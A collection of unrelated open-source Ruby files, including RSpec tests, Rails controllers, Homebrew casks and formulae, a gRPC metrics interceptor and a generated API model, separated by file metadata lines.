'rspec:windows 0/1 name' => 'rspec:windows name',
'rspec:windows 0:1' => 'rspec:windows',
'rspec:windows 0:1 name' => 'rspec:windows name',
'rspec:windows 10000 20000' => 'rspec:windows',
'rspec:windows 0 : / 1' => 'rspec:windows',
'rspec:windows 0 : / 1 name' => 'rspec:windows name',
'0 1 name ruby' => 'name ruby',
'0 :/ 1 name ruby' => 'name ruby'
}
tests.each do |name, group_name|
it "'#{name}' puts in '#{group_name}'" do
commit_status.name = name
is_expected.to eq(group_name)
end
end
end
describe '#detailed_status' do
let(:user) { create(:user) }
it 'returns a detailed status' do
expect(commit_status.detailed_status(user))
.to be_a Gitlab::Ci::Status::Success
end
end
describe '#sortable_name' do
tests = {
'karma' => ['karma'],
'karma 0 20' => ['karma ', 0, ' ', 20],
'karma 10 20' => ['karma ', 10, ' ', 20],
'karma 50:100' => ['karma ', 50, ':', 100],
'karma 1.10' => ['karma ', 1, '.', 10],
'karma 1.5.1' => ['karma ', 1, '.', 5, '.', 1],
'karma 1 a' => ['karma ', 1, ' a']
}
tests.each do |name, sortable_name|
it "'#{name}' sorts as '#{sortable_name}'" do
commit_status.name = name
expect(commit_status.sortable_name).to eq(sortable_name)
end
end
end
describe '#locking_enabled?' do
before do
commit_status.lock_version = 100
end
subject { commit_status.locking_enabled? }
context "when changing status" do
before do
commit_status.status = "running"
end
it "lock" do
is_expected.to be true
end
it "raise exception when trying to update" do
expect { commit_status.save }.to raise_error(ActiveRecord::StaleObjectError)
end
end
context "when changing description" do
before do
commit_status.description = "test"
end
it "do not lock" do
is_expected.to be false
end
it "save correctly" do
expect(commit_status.save).to be true
end
end
end
describe 'set failure_reason when drop' do
let(:commit_status) { create(:commit_status, :created) }
subject do
commit_status.drop!(reason)
commit_status
end
context 'when failure_reason is nil' do
let(:reason) { }
it { is_expected.to be_unknown_failure }
end
context 'when failure_reason is script_failure' do
let(:reason) { :script_failure }
it { is_expected.to be_script_failure }
end
end
describe 'ensure stage assignment' do
context 'when commit status has a stage_id assigned' do
let!(:stage) do
create(:ci_stage_entity, project: project, pipeline: pipeline)
end
let(:commit_status) do
create(:commit_status, stage_id: stage.id, name: 'rspec', stage: 'test')
end
it 'does not create a new stage' do
expect { commit_status }.not_to change { Ci::Stage.count }
expect(commit_status.stage_id).to eq stage.id
end
end
context 'when commit status does not have a stage_id assigned' do
let(:commit_status) do
create(:commit_status, name: 'rspec', stage: 'test', status: :success)
end
let(:stage) { Ci::Stage.first }
it 'creates a new stage' do
expect { commit_status }.to change { Ci::Stage.count }.by(1)
expect(stage.name).to eq 'test'
expect(stage.project).to eq commit_status.project
expect(stage.pipeline).to eq commit_status.pipeline
expect(stage.status).to eq commit_status.status
expect(commit_status.stage_id).to eq stage.id
end
end
context 'when commit status does not have stage but it exists' do
let!(:stage) do
create(:ci_stage_entity, project: project,
pipeline: pipeline,
name: 'test')
end
let(:commit_status) do
create(:commit_status, project: project,
pipeline: pipeline,
name: 'rspec',
stage: 'test',
status: :success)
end
it 'uses existing stage' do
expect { commit_status }.not_to change { Ci::Stage.count }
expect(commit_status.stage_id).to eq stage.id
expect(stage.reload.status).to eq commit_status.status
end
end
context 'when commit status is being imported' do
let(:commit_status) do
create(:commit_status, name: 'rspec', stage: 'test', importing: true)
end
it 'does not create a new stage' do
expect { commit_status }.not_to change { Ci::Stage.count }
expect(commit_status.stage_id).not_to be_present
end
end
end
describe '#enqueue' do
let!(:current_time) { Time.new(2018, 4, 5, 14, 0, 0) }
before do
allow(Time).to receive(:now).and_return(current_time)
end
shared_examples 'commit status enqueued' do
it 'sets queued_at value when enqueued' do
expect { commit_status.enqueue }.to change { commit_status.reload.queued_at }.from(nil).to(current_time)
end
end
context 'when initial state is :created' do
let(:commit_status) { create(:commit_status, :created) }
it_behaves_like 'commit status enqueued'
end
context 'when initial state is :skipped' do
let(:commit_status) { create(:commit_status, :skipped) }
it_behaves_like 'commit status enqueued'
end
context 'when initial state is :manual' do
let(:commit_status) { create(:commit_status, :manual) }
it_behaves_like 'commit status enqueued'
end
context 'when initial state is :scheduled' do
let(:commit_status) { create(:commit_status, :scheduled) }
it_behaves_like 'commit status enqueued'
end
end
describe '#present' do
subject { commit_status.present }
it { is_expected.to be_a(CommitStatusPresenter) }
end
end
| 28.021849 | 112 | 0.626102 |
622dc67bbda561200cd3455522ea9c2c1f1baf74
| 2,723 |
module GRPCPrometheus
class ServerInterceptor < ::GRPC::ServerInterceptor
def initialize(server_metrics)
@server_metrics = server_metrics
end
def request_response(request: nil, call: nil, method: nil)
reporter = ServerReporter.new(
server_metrics: @server_metrics,
method: method,
grpc_type: GRPCType::UNARY,
)
grpc_err = nil
yield
rescue => err
grpc_err = to_grpc_err(err)
raise err
ensure
if grpc_err
reporter.handled(Util::ALL_CODES[grpc_err.code])
else
reporter.handled(Util::ALL_CODES[::GRPC::Core::StatusCodes::OK])
end
end
# These metrics for streaming messages can't be collected
# with the current gRPC implementation in Ruby
#
# - grpc_server_msg_received_total
# - grpc_server_msg_sent_total
#
# Need to wait for this Pull Request to be released:
#
# - https://github.com/grpc/grpc/pull/17651
def client_streamer(call: nil, method: nil)
reporter = ServerReporter.new(
server_metrics: @server_metrics,
method: method,
grpc_type: GRPCType::CLIENT_STREAM,
)
grpc_err = nil
yield
rescue => err
grpc_err = to_grpc_err(err)
raise err
ensure
if grpc_err
reporter.handled(Util::ALL_CODES[grpc_err.code])
else
reporter.handled(Util::ALL_CODES[::GRPC::Core::StatusCodes::OK])
end
end
def server_streamer(request: nil, call: nil, method: nil)
reporter = ServerReporter.new(
server_metrics: @server_metrics,
method: method,
grpc_type: GRPCType::SERVER_STREAM,
)
grpc_err = nil
yield
rescue => err
grpc_err = to_grpc_err(err)
raise err
ensure
if grpc_err
reporter.handled(Util::ALL_CODES[grpc_err.code])
else
reporter.handled(Util::ALL_CODES[::GRPC::Core::StatusCodes::OK])
end
end
def bidi_streamer(requests: nil, call: nil, method: nil)
reporter = ServerReporter.new(
server_metrics: @server_metrics,
method: method,
grpc_type: GRPCType::BIDI_STREAM,
)
grpc_err = nil
yield
rescue => err
grpc_err = to_grpc_err(err)
raise err
ensure
if grpc_err
reporter.handled(Util::ALL_CODES[grpc_err.code])
else
reporter.handled(Util::ALL_CODES[::GRPC::Core::StatusCodes::OK])
end
end
private
def to_grpc_err(err)
if err.is_a?(::GRPC::BadStatus)
err
else
::GRPC::BadStatus.new_status_exception(
::GRPC::Core::StatusCodes::UNKNOWN,
err.message
)
end
end
end
end
| 25.448598 | 72 | 0.618068 |
ff51d555bc4f8f2b112d57d5656f2fb9f4699234
| 1,068 |
require 'rails_helper'
RSpec.describe ItemsService do
let(:user) { create :user }
let(:search) { create(:search, user: user) }
let(:old_item) { create(:item, search: search) }
let(:old_price) { create(:price, item: old_item) }
let(:items_data) { DataSupport.parsed_items }
context 'as usual' do
it 'create new items and prices' do
expect do
described_class.call(search_id: search.id, data: items_data)
end.to change { Item.count }.by(1)
.and change { Price.count }.by(1)
end
it 'update old items and create prices' do
items_data = DataSupport.parsed_items(init_id: old_item.product_id
.split('_')[1])
expect(old_price).to be_valid
expect(old_item.product_id).to eq(items_data.keys.first)
expect do
described_class.call(search_id: search.id,
data: items_data)
end.to change { Item.first.updated_at }
.and change { Price.count }.by(1)
end
end
end
| 34.451613 | 76 | 0.593633 |
212c671aa70c7290feeec50075ccdb57cfbedc3d
| 577 |
class Manager::DailyFinancials < ApplicationService
expects do
required(:manager).filled
end
delegate :manager, to: :context
before do
context.manager = Manager.ensure!(manager)
end
def call
manager.bands.each do |band|
result = Band::DailyUpdate.call(band: band)
if result.success?
Band::SpendMoney.(band: band, amount: result.daily_running_costs)
Band::EarnMoney.(band: band, amount: result.earnings )
else
# Probably should tell someone that the band couldn't update it's data
end
end
end
end
| 24.041667 | 78 | 0.67591 |
8713041e5d83347024009745d5dde6ca9aadd5d5
| 394 |
cask 'kodelife' do
version '0.7.5.57'
sha256 '2cc81702d042ce83fa34d41812598356cff27fb1fc061d883cbd80827dbe1344'
url "https://hexler.net/pub/kodelife/kodelife-#{version}-macos.zip"
appcast 'https://hexler.net/pub/kodelife/appcast.hex'
name 'KodeLife'
homepage 'https://hexler.net/software/kodelife'
auto_updates true
depends_on macos: '>= :mavericks'
app 'KodeLife.app'
end
| 26.266667 | 75 | 0.751269 |
bf68e4aa49c6056556edd56ce7e4de0c624561ed
| 6,860 |
=begin
PureCloud Platform API
With the PureCloud Platform API, you can control all aspects of your PureCloud environment. With the APIs you can access the system configuration, manage conversations and more.
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
License: ININ
http://www.inin.com
Terms of Service: https://developer.mypurecloud.com/tos
=end
require 'date'
module PureCloud
class EdgeMetricsProcessor
# Percent time processor was active.
attr_accessor :active_time_pct
# Machine CPU identifier. 'total' will always be included in the array and is the total of all CPU resources.
attr_accessor :cpu_id
# Percent time processor was idle.
attr_accessor :idle_time_pct
# Percent time processor spent in privileged mode.
attr_accessor :privileged_time_pct
# Percent time processor spent in user mode.
attr_accessor :user_time_pct
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'active_time_pct' => :'activeTimePct',
:'cpu_id' => :'cpuId',
:'idle_time_pct' => :'idleTimePct',
:'privileged_time_pct' => :'privilegedTimePct',
:'user_time_pct' => :'userTimePct'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'active_time_pct' => :'Float',
:'cpu_id' => :'String',
:'idle_time_pct' => :'Float',
:'privileged_time_pct' => :'Float',
:'user_time_pct' => :'Float'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
if attributes.has_key?(:'activeTimePct')
self.active_time_pct = attributes[:'activeTimePct']
end
if attributes.has_key?(:'cpuId')
self.cpu_id = attributes[:'cpuId']
end
if attributes.has_key?(:'idleTimePct')
self.idle_time_pct = attributes[:'idleTimePct']
end
if attributes.has_key?(:'privilegedTimePct')
self.privileged_time_pct = attributes[:'privilegedTimePct']
end
if attributes.has_key?(:'userTimePct')
self.user_time_pct = attributes[:'userTimePct']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properies with the reasons
def list_invalid_properties
invalid_properties = Array.new
return invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
active_time_pct == o.active_time_pct &&
cpu_id == o.cpu_id &&
idle_time_pct == o.idle_time_pct &&
privileged_time_pct == o.privileged_time_pct &&
user_time_pct == o.user_time_pct
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[active_time_pct, cpu_id, idle_time_pct, privileged_time_pct, user_time_pct].hash
end
# build the object from hash
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
else
#TODO show warning in debug mode
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
else
# data not found in attributes(hash), not an issue as the data can be optional
end
end
self
end
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /^(true|t|yes|y|1)$/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
_model = Object.const_get("PureCloud").const_get(type).new
_model.build_from_hash(value)
end
end
def to_s
to_hash.to_s
end
# to_body is an alias to to_body (backward compatibility))
def to_body
to_hash
end
# return the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Method to output non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
def _to_hash(value)
if value.is_a?(Array)
value.compact.map{ |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 22.345277 | 177 | 0.567784 |
037425fe77208d88b56d8390b6b277341ea20173
| 766 |
cask 'joplin' do
version '1.0.227'
sha256 '01da5f312295bde810fe0165dc0b2c025197cb6092ab5673692bca8d238b9ca9'
# github.com/laurent22/joplin/ was verified as official when first introduced to the cask
url "https://github.com/laurent22/joplin/releases/download/v#{version}/Joplin-#{version}.dmg"
appcast 'https://github.com/laurent22/joplin/releases.atom'
name 'Joplin'
homepage 'https://joplin.cozic.net/'
app 'Joplin.app'
zap trash: [
'~/Library/Application Support/Joplin',
'~/Library/Preferences/net.cozic.joplin-desktop.helper.plist',
'~/Library/Preferences/net.cozic.joplin-desktop.plist',
'~/Library/Saved Application State/net.cozic.joplin-desktop.savedState',
]
end
| 38.3 | 95 | 0.693211 |
33451b210a68cdcd7e5128a10003a1467c01414e
| 1,331 |
#
class AssistsController < ProtectedController
before_action :set_assist, only: [:show, :update, :destroy]
before_action :authenticate, only: [:update, :create, :destroy]
# GET /assists
# GET /assists.json
def index
@assists = Assist.all
render json: @assists
end
# GET /assists/1
# GET /assists/1.json
def show
render json: @assist
end
# POST /assists
# POST /assists.json
def create
if current_user.admin == 'true'
@assist = Assist.new(assist_params)
if @assist.save
render json: @assist, status: :created, location: @assist
else
render json: @assist.errors, status: :unprocessable_entity
end
end
end
# PATCH/PUT /assists/1
# PATCH/PUT /assists/1.json
def update
if current_user.admin == 'true'
@assist = Assist.find(params[:id])
if @assist.update(assist_params)
head :no_content
else
render json: @assist.errors, status: :unprocessable_entity
end
end
end
# DELETE /assists/1
# DELETE /assists/1.json
def destroy
return unless current_user.admin == 'true'
@assist.destroy
head :no_content
end
private
def set_assist
@assist = Assist.find(params[:id])
end
def assist_params
params.require(:assist).permit(:player_id, :game_id)
end
end
| 19.865672 | 66 | 0.649136 |
1a56035796bb0fd5c8d78c8400ae204ebde1dd48
| 587 |
module VendorAPI
class RejectionReasonPresenter
attr_reader :application_choice
def initialize(application_choice)
@application_choice = application_choice
end
def present
if application_choice.structured_rejection_reasons.present?
rejection_reasons
else
application_choice.rejection_reason
end
end
private
def rejection_reasons
reasons = RejectedApplicationChoicePresenter.new(application_choice).rejection_reasons
reasons.map { |k, v| %(#{k}:\n#{Array(v).join("\n")}) }.join("\n\n")
end
end
end
| 23.48 | 92 | 0.706985 |
f7f63503ae2d38fb9c5fc010133e887fbd23ad3e
| 1,202 |
module ConfigFindAllAsTree
def find_all_as_tree
returning(ActiveSupport::OrderedHash.new) do |result|
db_key = (ActiveRecord::Base.connection.adapter_name.downcase == 'mysql' ? '`key`' : 'key')
# For all settings
find(:all, :order => db_key).each do |setting|
# Split the setting path into an array
path = setting.key.split('.')
# Set the current level to the root of the hash
current_level = result
# iterate through all path levels
path.each do |path_element|
if path_element == path.last
# We are at the end of the path, so set the settting object as the value
current_level[path_element] = setting
else
# Not at the end yet, so first make sure that there is a hash for this key
current_level[path_element] ||= ActiveSupport::OrderedHash.new
# Reset the curent level to this hash object for this key
current_level = current_level[path_element]
end
end # if
end # each
end # returning
end # find_all_as_tree
end # ConfigFindAllAsTree
| 34.342857 | 97 | 0.59817 |
bb185b888015bbea229513b7530d518ade3c7a53
| 1,506 |
# encoding: utf-8
#
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Selenium
module WebDriver
module PhantomJS
#
# @api private
#
class Service < WebDriver::Service
DEFAULT_PORT = 8910
@executable = 'phantomjs'.freeze
@missing_text = 'Unable to find phantomjs. Please download from http://phantomjs.org/download.html'.freeze
private
def start_process
@process = build_process(@executable_path, "--webdriver=#{@port}", *@extra_args)
@process.start
end
def cannot_connect_error_text
"unable to connect to phantomjs @ #{uri} after #{START_TIMEOUT} seconds"
end
end # Service
end # PhantomJS
end # WebDriver
end # Selenium
| 32.73913 | 114 | 0.700531 |
7a147abdc9b0381acaab2eafa7f4bd522a4c4d0a
| 141 |
require "ArduinoStringToNum/version"
require "ArduinoStringToNum/ArduinoBinTo"
class ArduinoStringToNum < String
include ArduinoBinTo
end
| 20.142857 | 41 | 0.851064 |
01686cab73c3b53b79b4e924cffa162c1a2b6bea
| 1,682 |
#
# Be sure to run `pod lib lint RichTextView.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'RichTextView'
s.version = '3.1.0'
s.summary = 'iOS Text View that Properly Displays LaTeX, HTML, Markdown, and YouTube/Vimeo Links.'
s.description = <<-DESC
This is an iOS UIView that Properly Displays LaTeX, HTML, Markdown, and YouTube/Vimeo Links. Simply feed in an input
string with the relevant rich text surrounded by the appropriate tags and it will render correctly. Specifically:
- Any math/LaTeX should be in between [math] and [/math] tags
- Any code should be in between [code] and [/code] tags
- Any YouTube videos should be represented as youtube[x], where x is the ID of the YouTube video
- Any Vimeo videos should be represented as vimeo[y], where y is the ID of the Vimeo video
DESC
s.homepage = 'https://github.com/tophat/RichTextView'
s.license = { :type => 'Apache-2', :file => 'LICENSE' }
s.author = { 'Top Hat' => 'tophat' }
s.source = { :git => 'https://github.com/tophat/RichTextView.git', :tag => s.version.to_s }
s.ios.deployment_target = '10.0'
s.source_files = 'Source/*.swift', 'Source/Text Parsing/*.swift', 'Source/Constants/*.swift', 'Source/Extensions/*.swift', 'Source/View Generators/*.swift', 'Source/Delegates/*.swift'
s.dependency 'Down'
s.dependency 'iosMath'
s.dependency 'SnapKit'
s.swift_version = '5.0'
end
| 49.470588 | 185 | 0.671819 |
1169bf0cdbbb74287ee1f77d54587351fb5a0e2d
| 4,628 |
require "abstract_unit"
class UrlEncodedParamsParsingTest < ActionDispatch::IntegrationTest
class TestController < ActionController::Base
class << self
attr_accessor :last_request_parameters, :last_request_type
end
def parse
self.class.last_request_parameters = request.request_parameters
head :ok
end
end
def teardown
TestController.last_request_parameters = nil
end
test "parses unbalanced query string with array" do
query = "location[]=1&location[]=2&age_group[]=2"
expected = { "location" => ["1", "2"], "age_group" => ["2"] }
assert_parses expected, query
end
test "parses nested hash" do
query = [
"note[viewers][viewer][][type]=User",
"note[viewers][viewer][][id]=1",
"note[viewers][viewer][][type]=Group",
"note[viewers][viewer][][id]=2"
].join("&")
expected = {
"note" => {
"viewers" => {
"viewer" => [
{ "id" => "1", "type" => "User" },
{ "type" => "Group", "id" => "2" }
]
}
}
}
assert_parses expected, query
end
test "parses more complex nesting" do
query = [
"customers[boston][first][name]=David",
"customers[boston][first][url]=http://David",
"customers[boston][second][name]=Allan",
"customers[boston][second][url]=http://Allan",
"something_else=blah",
"something_nil=",
"something_empty=",
"products[first]=Apple Computer",
"products[second]=Pc",
"=Save"
].join("&")
expected = {
"customers" => {
"boston" => {
"first" => {
"name" => "David",
"url" => "http://David"
},
"second" => {
"name" => "Allan",
"url" => "http://Allan"
}
}
},
"something_else" => "blah",
"something_empty" => "",
"something_nil" => "",
"products" => {
"first" => "Apple Computer",
"second" => "Pc"
}
}
assert_parses expected, query
end
test "parses params with array" do
query = "selected[]=1&selected[]=2&selected[]=3"
expected = { "selected" => ["1", "2", "3"] }
assert_parses expected, query
end
test "parses params with nil key" do
query = "=&test2=value1"
expected = { "test2" => "value1" }
assert_parses expected, query
end
test "parses params with array prefix and hashes" do
query = "a[][b][c]=d"
expected = { "a" => [{ "b" => { "c" => "d" } }] }
assert_parses expected, query
end
test "parses params with complex nesting" do
query = "a[][b][c][][d][]=e"
expected = { "a" => [{ "b" => { "c" => [{ "d" => ["e"] }] } }] }
assert_parses expected, query
end
test "parses params with file path" do
query = [
"customers[boston][first][name]=David",
"something_else=blah",
"logo=#{File.expand_path(__FILE__)}"
].join("&")
expected = {
"customers" => {
"boston" => {
"first" => {
"name" => "David"
}
}
},
"something_else" => "blah",
"logo" => File.expand_path(__FILE__),
}
assert_parses expected, query
end
test "parses params with Safari 2 trailing null character" do
query = "selected[]=1&selected[]=2&selected[]=3\0"
expected = { "selected" => ["1", "2", "3"] }
assert_parses expected, query
end
test "ambiguous params returns a bad request" do
with_test_routing do
post "/parse", params: "foo[]=bar&foo[4]=bar"
assert_response :bad_request
end
end
private
def with_test_routing
with_routing do |set|
set.draw do
ActiveSupport::Deprecation.silence do
post ":action", to: ::UrlEncodedParamsParsingTest::TestController
end
end
yield
end
end
def assert_parses(expected, actual)
with_test_routing do
post "/parse", params: actual
assert_response :ok
assert_equal expected, TestController.last_request_parameters
assert_utf8 TestController.last_request_parameters
end
end
def assert_utf8(object)
correct_encoding = Encoding.default_internal
unless object.is_a?(Hash)
assert_equal correct_encoding, object.encoding, "#{object.inspect} should have been UTF-8"
return
end
object.each_value do |v|
case v
when Hash
assert_utf8 v
when Array
v.each { |el| assert_utf8 el }
else
assert_utf8 v
end
end
end
end
| 25.711111 | 98 | 0.55229 |
7aebb3ca0d03b3f8cd6b93e4bc3e44b8b17faf31
| 856 |
cask "canon-imageformula-driver" do
version "1.7.19.0917"
sha256 "9d02496b46d5e2d706734b892041a0d6f1bebc186d533cb00674767d727b3788"
# files.canon-europe.com/files/soft01-48579/Driver/ was verified as official when first introduced to the cask
url "https://files.canon-europe.com/files/soft01-48579/Driver/P215II_Installer.zip"
name "Canon ImageFormula Twain Driver"
homepage "https://www.canon.se/support/consumer_products/products/scanners/others/imageformula_p-215ii.html?type=drivers"
depends_on macos: ">= :sierra"
pkg "P215II_Installer.pkg"
uninstall quit: [
"com.canonElectronics.Installer.scanserver.pkg",
"com.canonElectronics.scanserver",
],
pkgutil: [
"com.canonElectronics.Installer.P215II Driver.pkg",
"com.canonElectronics.Installer.scanserver.pkg",
]
end
| 37.217391 | 123 | 0.732477 |
286742c345ff8c9f96960c54ff501ea2d6d359c8
| 2,526 |
class AiAmbulanceController < ApplicationController
def ai_direction
color = ["#6b6b6b","#e00b00","#62c100","#0e00f4","#9d6e8a","#988f66","#191919"]
result = []
setup_time = 10 # 15 min to pick up patient and place in hospital
speed = 50 # speed: 70km/hr = (70/60)km/min
setup_time = params[:setup].to_i if params[:setup] # 15 min to pick up patient and place in hospital
speed = params[:speed].to_i if params[:speed] # speed: 70km/hr = (70/60)km/min
total_injure = 0
geo_hash = {}
geo_code = {}
color_json = {}
save_id = []
length = params[:length].to_i
1.upto(length) do |k|
next unless params["lat#{k}".intern]
this_injure = params["injure#{k}".intern].to_i
geo_hash[k] = {lat: params["lat#{k}".intern], lng: params["lng#{k}".intern], address: params["address#{k}".intern], injure: this_injure}
total_injure += this_injure
geo_code[k] = [params["lat#{k}".intern].to_f, params["lng#{k}".intern].to_f]
end
hos_geo = {}
schedule, d_to_hospital = AiAmbulanceHelper.compare_119_distance(geo_hash, setup_time, speed, total_injure)
schedule.each do |k|
id = k[:id]
next if save_id.include? id
save_id << id
unless color_json.has_key? k[:name]
if color.length > 0
color_json[k[:name]] = color.shift
else
color_json[k[:name]] = "#"+"%06x" % (rand * 0xffffff)
end
end
# color_json[k[:name]] = "#e7e7e7"
tmp = {}
disaster_id = k[:disaster_id]
tmp[:from] = [k[:start_lat], k[:start_lng]]
tmp[:fromText] = k[:name]
# tmp[:toText] = k[:name]
hos_geo[disaster_id] = [k[:hos_lat], k[:hos_lng]]
# tmp[:waypoint] = [geo_code[disaster_id]]
tmp[:to] = geo_code[disaster_id]
tmp[:color] = color_json[k[:name]]
tmp[:icon] = {to:"http://i.imgur.com/B8xApKX.png", from: "http://i.imgur.com/rXh2tJE.png"} #http://i.imgur.com/g8CFAxs.png
result.push(tmp)
end
hos_geo.each do |id, geo|
tmp = {}
tmp[:from] = geo_code[id]
tmp[:to] = geo
tmp[:icon] = {to: "http://i.imgur.com/g8CFAxs.png"}
result.unshift(tmp)
end
render json: result.to_json
end
end
| 42.813559 | 148 | 0.524941 |
5d1a270fc306b5d66c61da63727771062439a973
| 3,464 |
class ApachePulsar < Formula
desc "Cloud-native distributed messaging and streaming platform"
homepage "https://pulsar.apache.org/"
url "https://www.apache.org/dyn/mirrors/mirrors.cgi?action=download&filename=pulsar/pulsar-2.8.0/apache-pulsar-2.8.0-src.tar.gz"
mirror "https://archive.apache.org/dist/pulsar/pulsar-2.8.0/apache-pulsar-2.8.0-src.tar.gz"
sha256 "0e161a81c62c7234c1e0c243bb6fe30046ec1cd01472618573ecdc2a73b1163b"
license "Apache-2.0"
head "https://github.com/apache/pulsar.git", branch: "master"
bottle do
sha256 cellar: :any_skip_relocation, big_sur: "56b01c024746edd357eb7d944ee258a734313afd6b0d1e4f79fcf321a38fd740"
sha256 cellar: :any_skip_relocation, catalina: "8733b6cfe86c7161827db14c5434262c9df80fb292a80ddb900a805c4775d33b"
sha256 cellar: :any_skip_relocation, mojave: "15ff056e732b154fb6b05aad64ea2dce42e5a2e4ee79e03aa52233103307074c"
sha256 cellar: :any_skip_relocation, x86_64_linux: "01e0bb86f62ddd706f7e66f8c6f83ccf3970b10a22d873e018022105bfa53a35"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "cppunit" => :build
depends_on "libtool" => :build
depends_on "maven" => :build
depends_on "pkg-config" => :build
depends_on "protobuf" => :build
depends_on arch: :x86_64
depends_on "openjdk@11"
def install
# Missing executable permission reported upstream: https://github.com/apache/pulsar/issues/11833
chmod "+x", "src/rename-netty-native-libs.sh"
with_env("TMPDIR" => buildpath, **Language::Java.java_home_env("11")) do
system "mvn", "-X", "clean", "package", "-DskipTests", "-Pcore-modules"
end
built_version = if build.head?
# This script does not need any particular version of py3 nor any libs, so both
# brew-installed python and system python will work.
Utils.safe_popen_read("python3", "src/get-project-version.py").strip
else
version
end
binpfx = "apache-pulsar-#{built_version}"
system "tar", "-xf", "distribution/server/target/#{binpfx}-bin.tar.gz"
libexec.install "#{binpfx}/bin", "#{binpfx}/lib", "#{binpfx}/instances", "#{binpfx}/conf"
(libexec/"lib/presto/bin/procname/Linux-ppc64le").rmtree
pkgshare.install "#{binpfx}/examples", "#{binpfx}/licenses"
(etc/"pulsar").install_symlink libexec/"conf"
libexec.glob("bin/*") do |path|
if !path.fnmatch?("*common.sh") && !path.directory?
bin_name = path.basename
(bin/bin_name).write_env_script libexec/"bin"/bin_name, Language::Java.java_home_env("11")
end
end
end
def post_install
(var/"log/pulsar").mkpath
end
service do
run [bin/"pulsar", "standalone"]
log_path var/"log/pulsar/output.log"
error_log_path var/"log/pulsar/error.log"
end
test do
fork do
exec bin/"pulsar", "standalone", "--zookeeper-dir", "#{testpath}/zk", " --bookkeeper-dir", "#{testpath}/bk"
end
# The daemon takes some time to start; pulsar-client will retry until it gets a connection, but emit confusing
# errors until that happens, so sleep to reduce log spam.
sleep 15
output = shell_output("#{bin}/pulsar-client produce my-topic --messages 'hello-pulsar'")
assert_match "1 messages successfully produced", output
output = shell_output("#{bin}/pulsar initialize-cluster-metadata -c a -cs localhost -uw localhost -zk localhost")
assert_match "Cluster metadata for 'a' setup correctly", output
end
end
| 42.243902 | 130 | 0.713048 |
331591d97fe88d04fb7a800f094419e8fe27bfc8
| 215 |
def describe_number(number)
number ||= 42
puts "My number is: #{number}"
sign(number)
end
def sign(number)
case
when number > 0
'Positive'
when number < 0
'Negative'
else
'Zero'
end
end
| 12.647059 | 32 | 0.623256 |
619101623f1384e01bbd7d048a53485b62a552f4
| 6,884 |
require 'test_helper'
class DatabaseRewinder::DatabaseRewinderTest < ActiveSupport::TestCase
setup do
DatabaseRewinder.init
end
sub_test_case '.[]' do
teardown do
DatabaseRewinder.database_configuration = nil
end
sub_test_case 'for connecting to an arbitrary database' do
test 'simply giving a connection name only' do
DatabaseRewinder.database_configuration = {'aaa' => {'adapter' => 'sqlite3', 'database' => ':memory:'}}
DatabaseRewinder['aaa']
assert_equal ['aaa'], DatabaseRewinder.instance_variable_get(:'@cleaners').map {|c| c.connection_name}
end
test 'giving a connection name via Hash with :connection key' do
DatabaseRewinder.database_configuration = {'bbb' => {'adapter' => 'sqlite3', 'database' => ':memory:'}}
DatabaseRewinder[connection: 'bbb']
assert_equal ['bbb'], DatabaseRewinder.instance_variable_get(:'@cleaners').map {|c| c.connection_name}
end
test 'the Cleaner compatible syntax' do
DatabaseRewinder.database_configuration = {'ccc' => {'adapter' => 'sqlite3', 'database' => ':memory:'}}
DatabaseRewinder[:aho, connection: 'ccc']
assert_equal ['ccc'], DatabaseRewinder.instance_variable_get(:'@cleaners').map {|c| c.connection_name}
end
end
test 'for connecting to multiple databases' do
